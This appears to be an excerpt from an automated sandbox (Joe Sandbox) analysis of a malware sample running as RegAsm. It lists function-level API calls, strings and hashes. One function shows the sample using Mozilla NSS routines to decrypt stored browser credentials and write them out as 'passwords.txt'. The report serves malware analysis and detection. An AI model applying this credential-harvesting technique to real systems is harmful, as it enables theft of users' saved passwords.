                                                                                                          • Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
                                                                                                          • Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
                                                                                                          • Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 838878465-0
                                                                                                        • Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
                                                                                                        • Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
                                                                                                        • Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
                                                                                                        • Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54
                                                                                                        Function 6C0DCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C0A582D), ref: 6C0DCC27
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C0A582D), ref: 6C0DCC3D
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C10FE98,?,?,?,?,?,6C0A582D), ref: 6C0DCC56
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCC6C
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCC82
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCC98
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCCAE
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C0DCCC4
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C0DCCDA
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C0DCCEC
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C0DCCFE
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C0DCD14
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C0DCD82
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C0DCD98
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C0DCDAE
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C0DCDC4
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C0DCDDA
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C0DCDF0
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C0DCE06
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C0DCE1C
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C0DCE32
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C0DCE48
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C0DCE5E
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C0DCE74
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C0DCE8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strcmp
                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                        • Opcode ID: 01ec046a675025959ccd4ebea63c1c0642dcbfc2fb22de8711c9917a1e933573
                                                                                                        • Instruction ID: 295ab8c0cc78028df7263a9135f1999eb88e64030e373c73085acf3fa6955742
                                                                                                        • Opcode Fuzzy Hash: 01ec046a675025959ccd4ebea63c1c0642dcbfc2fb22de8711c9917a1e933573
                                                                                                        • Instruction Fuzzy Hash: CB51B9E1B5532522FE0034155D25BAE66C5EB1324EF61803EFD19A5FC0FF14B6098ABB
                                                                                                        Function 0040A916 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211stringmemoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
                                                                                                        • StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
                                                                                                        • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
                                                                                                        • lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
                                                                                                        • lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
                                                                                                        • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
                                                                                                        • lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA
                                                                                                          • Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
                                                                                                          • Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
                                                                                                          • Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
                                                                                                          • Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
                                                                                                          • Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
                                                                                                          • Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
                                                                                                          • Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
                                                                                                          • Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
                                                                                                        • lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28
                                                                                                          • Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
                                                                                                          • Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
                                                                                                        • lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
                                                                                                        • lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AB7D
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040ABAC
                                                                                                        • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                        • String ID: passwords.txt$pe
                                                                                                        • API String ID: 2725232238-1761351166
                                                                                                        • Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
                                                                                                        • Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
                                                                                                        • Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
                                                                                                        • Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6
                                                                                                        Function 6C1E28A0 Relevance: 50.9, APIs: 12, Strings: 17, Instructions: 155COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C1E28BD
                                                                                                        • PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C1E28EF
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0B88
                                                                                                          • Part of subcall function 6C2C09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2C0C5D
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C2C0C8D
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0C9C
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0CD1
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C2C0CEC
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0CFB
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0D16
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C2C0D26
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0D35
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C2C0D65
                                                                                                          • Part of subcall function 6C2C09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C2C0D70
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0D90
                                                                                                          • Part of subcall function 6C2C09D0: free.MOZGLUE(00000000), ref: 6C2C0D99
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C1E28D6
                                                                                                          • Part of subcall function 6C2C09D0: PR_Now.NSS3 ref: 6C2C0A22
                                                                                                          • Part of subcall function 6C2C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C2C0A35
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C2C0A66
                                                                                                          • Part of subcall function 6C2C09D0: PR_GetCurrentThread.NSS3 ref: 6C2C0A70
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C2C0A9D
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C2C0AC8
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsmprintf.NSS3(?,?), ref: 6C2C0AE8
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0B19
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0B48
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0C76
                                                                                                          • Part of subcall function 6C2C09D0: PR_LogFlush.NSS3 ref: 6C2C0C7E
                                                                                                        • PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C1E2963
                                                                                                        • PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C1E2983
                                                                                                        • PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C1E29A3
                                                                                                        • PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C1E29C3
                                                                                                        • PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C1E2A26
                                                                                                        • PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C1E2A48
                                                                                                        • PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C1E2A66
                                                                                                        • PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C1E2A8E
                                                                                                        • PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C1E2AB6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
                                                                                                        • String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$n,l
                                                                                                        • API String ID: 2460313690-3647692944
                                                                                                        • Opcode ID: 12b3239e503e62db4e6dfd867f0ca1f969c9e6beeaac2d825581dfd32f020710
                                                                                                        • Instruction ID: 5994273b852337f597abcacc1e97ffb350897a2c3381ce58718856fb131f03d9
                                                                                                        • Opcode Fuzzy Hash: 12b3239e503e62db4e6dfd867f0ca1f969c9e6beeaac2d825581dfd32f020710
                                                                                                        • Instruction Fuzzy Hash: CE51E6B1640149AFEB00CB50CE9AF5537B9EB86219F458078ED05DBF12DB32E804CBA2
                                                                                                        Function 6C286E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C13CA30: EnterCriticalSection.KERNEL32(?,?,?,6C19F9C9,?,6C19F4DA,6C19F9C9,?,?,6C16369A), ref: 6C13CA7A
                                                                                                          • Part of subcall function 6C13CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C13CB26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,6C14BE66), ref: 6C286E81
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C14BE66), ref: 6C286E98
                                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C2EAAF9,?,?,?,?,?,?,6C14BE66), ref: 6C286EC9
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C14BE66), ref: 6C286ED2
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C14BE66), ref: 6C286EF8
                                                                                                        • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C14BE66), ref: 6C286F1F
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286F28
                                                                                                        • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286F3D
                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C14BE66), ref: 6C286FA6
                                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C2EAAF9,00000000,?,?,?,?,?,?,?,6C14BE66), ref: 6C286FDB
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286FE4
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286FEF
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C14BE66), ref: 6C287014
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,6C14BE66), ref: 6C28701D
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C14BE66), ref: 6C287030
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C14BE66), ref: 6C28705B
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C14BE66), ref: 6C287079
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C14BE66), ref: 6C287097
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C2870A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                        • String ID: P,l$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                        • API String ID: 593473924-815665119
                                                                                                        • Opcode ID: 26cc66aa1e2a1288eecf92d699c056537376d80e82914e35e604629f544e3843
                                                                                                        • Instruction ID: 9ac8110946014007656ca062d6a50a743693a69ec0655551476513a81245a8d2
                                                                                                        • Opcode Fuzzy Hash: 26cc66aa1e2a1288eecf92d699c056537376d80e82914e35e604629f544e3843
                                                                                                        • Instruction Fuzzy Hash: 50516AA1F152296BE30096309CA1FBB36669B9274DF144638FC1996BC1FF25940E82E3
                                                                                                        Function 6C0A4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0A4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0A44B2,6C11E21C,6C11F7F8), ref: 6C0A473E
                                                                                                          • Part of subcall function 6C0A4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0A474A
                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0A44BA
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0A44D2
                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C11F80C,6C09F240,?,?), ref: 6C0A451A
                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0A455C
                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C0A4592
